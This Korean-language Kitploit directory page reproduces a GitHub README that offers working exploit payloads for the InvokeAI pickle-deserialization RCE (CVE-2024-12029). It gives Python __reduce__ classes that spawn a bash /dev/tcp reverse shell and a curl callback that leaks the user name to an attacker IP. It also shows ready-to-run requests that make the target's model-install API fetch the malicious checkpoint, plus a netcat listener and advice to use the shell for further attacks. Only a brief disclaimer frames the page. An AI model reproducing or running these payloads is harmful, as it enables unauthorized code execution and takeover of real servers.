Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload Development
GitHublu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods.

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

대안 접근법: 리버스 셸 및 콜백 테스트

개요

이 저장소는 SSH 키 주입이 실패할 때 InvokeAI RCE 취약점(CVE-2024-12029)에 대한 대안 페이로드 접근 방식을 포함합니다. 페이로드는 pickle 역직렬화가 실제로 발생하는지 테스트하고 대체 접근 방법을 제공하도록 설계되었습니다.

문제 설명

SSH 키 주입 페이로드가 성공적으로 전달(Status 201)되었지만 SSH 접속에 여전히 비밀번호가 필요한 경우, 이는 다음 중 하나를 나타냅니다:

  1. pickle 역직렬화가 발생하지 않음
  2. 명령어가 차단/샌드박싱되고 있음
  3. 실행 방식이 호환되지 않음

해결책: 대안 페이로드

📁 페이로드 파일

리버스 셸 페이로드

  • payload_reverse_bash.ckpt (89 bytes) - Bash 리버스 셸
  • payload_reverse_python.ckpt (267 bytes) - Python 리버스 셸
  • payload_reverse_nc.ckpt (70 bytes) - Netcat 리버스 셸

테스트 및 검증 페이로드

  • payload_callback_test.ckpt (115 bytes) - 역직렬화 확인을 위한 HTTP 콜백
  • payload_test.ckpt (90 bytes) - 간단한 파일 생성 테스트
  • payload_alt_exec.ckpt (223 bytes) - 대체 실행 방식

SSH 페이로드 (참고용)

  • payload_ssh_simple.ckpt (271 bytes) - 리눅스 호환 SSH 키 주입

🛠️ 테스트 스크립트

Kali 테스트 스크립트

  • kali_reverse_test.py - 종합 테스트 스위트

페이로드 생성기

  • reverse_shell_payload.py - 리버스 셸 페이로드 생성

🚀 빠른 사용법

1. 페이로드 서버 시작

root@kitploit:~
python web_server.py --port 8000

2. 콜백 테스트 (먼저 권장)

root@kitploit:~
# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. 리버스 셸 테스트

root@kitploit:~
# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. 간단한 실행 테스트

root@kitploit:~
# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 테스트 결과 해석

✅ 콜백 테스트 성공

  • 의미: pickle 역직렬화가 작동하고 있음
  • 다음 단계: 리버스 셸 또는 대체 SSH 페이로드 시도
  • 확인: HTTP 콜백에 대한 웹 서버 로그 확인

✅ 리버스 셸 성공

  • 의미: 명령어가 실행되고 네트워크 접근이 작동함
  • 결과: netcat 리스너를 통한 직접 셸 접근
  • 다음 단계: 추가 공격을 위해 리버스 셸 사용

✅ 테스트 파일 생성됨

  • 의미: 기본 명령어 실행이 작동함
  • 다음 단계: 대체 SSH 주입 방법 시도
  • 확인: 대상에서 /tmp/payload_test.txt 확인

콜백 페이로드

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

리버스 셸 페이로드

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

테스트 페이로드

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 참고 자료

  • CVE-2024-12029: InvokeAI 원격 코드 실행
  • PyTorch 불안전 역직렬화: torch.load() 취약점
  • Pickle reduce: Python 객체 직렬화 악용

⚠️ 면책 조항

이 저장소는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 사용자는 시스템을 테스트하기 전에 적절한 권한을 획득했는지 확인할 책임이 있습니다.

도구 다운로드